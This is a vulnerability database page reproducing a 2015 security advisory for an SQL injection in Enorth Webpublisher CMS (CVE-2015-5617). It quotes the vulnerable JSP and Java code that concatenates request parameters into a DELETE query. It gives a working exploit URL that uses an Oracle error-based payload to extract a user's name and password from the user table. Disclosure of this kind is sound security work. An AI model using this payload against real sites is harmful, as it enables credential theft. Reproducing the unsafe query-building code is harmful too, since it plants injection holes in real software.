Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormXin.wangPACKETSTORM:133082
HistoryAug 13, 2015 - 12:00 a.m.

Enorth Webpublisher CMS SQL Injection

2015-08-1300:00:00
xin.wang
packetstormsecurity.com
34

0.004 Low

EPSS

Percentile

73.2%

JSON
`Title:  
====  
[CVE-2015-5617]Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp cbNewsid   
  
  
Vendor:  
======  
http://products.enorth.com.cn/bfnrglxt/index.shtml  
Enorth Webpublisher CMS so far of the scale of tens of thousands of web sites, with the government, enterprises, scientific research and education and media industries fields such as nearly thousands of business users.   
  
  
Versions Affected:   
==============  
All versions  
  
  
Author:   
======  
xin.wang(xin.wang(at)dbappsecurity.com.cn)  
  
  
Vulnerability Description:  
====================  
/pub/m_pending_news/delete_pending_news.jsp  
<%  
String[] newsIdGroup;  
  
newsIdGroup = request.getParameterValues("cbNewsId");  
if (newsIdGroup == null || newsIdGroup.length == 0) {  
throw new P3Exception("mbx_news_submit_empty_news_id");  
} else {  
penTran.deletePendingNews(newsIdGroup);  
}  
%>  
  
/WEB-INF/classes/cn/com/enorth/pub3/m_news/PendingNewsBean.class  
  
public void deletePendingNews(String[] newsIds) throws Exception {  
Connection cn = null;  
PreparedStatement pstm = null;  
try {  
StringBuffer buf = new StringBuffer();  
buf.append("delete from tn_pending_news where news_id in (");  
int i = 0; for (int len = newsIds.length; i < len; i++) {  
buf.append(newsIds[i]).append(",");  
}  
buf.append("-1)");  
cn = P3DBTools.getPubConnection();  
pstm = cn.prepareStatement(buf.toString());  
pstm.executeUpdate();//执行  
cn.commit();  
} catch (Exception ex) {  
P3DBTools.rollback(cn);  
throw ex;  
} finally {  
P3DBTools.freeConnection(cn);  
}  
}  
}  
  
  
Exploit:  
======  
http://website.com/pub/m_pending_news/delete_pending_news.jsp?cbNewsId=2222)%20and%201=ctxsys.drithsx.sn(1,(select%20USER_NAME||PASS_WORD%20from%20TN_USER%20WHERE%20USER_ID=1))—  
  
  
  
Vulnerability Disclosure Timeline:  
  
===========================  
2015-07-28 Found The Vulnerability  
2015-08-02 Submitted To The Vendor  
2015-08-03 Fixed  
2015-08-13 Public Disclosure  
================================================================================================  
  
  
  
  
`

Related

cve 1
seebug 1
prion 1
zdt 1
cvelist 1
nvd 1
cve
cve
CVE-2015-5617
2020-02-12 15:15:11
seebug
seebug
Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp
2015-09-02 00:00:00
prion
prion
Sql injection
2020-02-12 15:15:00
zdt
zdt
Enorth Webpublisher CMS SQL Injection Vulnerability
2015-08-14 00:00:00
cvelist
cvelist
CVE-2015-5617
2020-02-12 14:30:26
nvd
nvd
CVE-2015-5617
2020-02-12 15:15:11

0.004 Low

EPSS

Percentile

73.2%

JSON
Related for PACKETSTORM:133082
cve1seebug1prion1zdt1cvelist1nvd1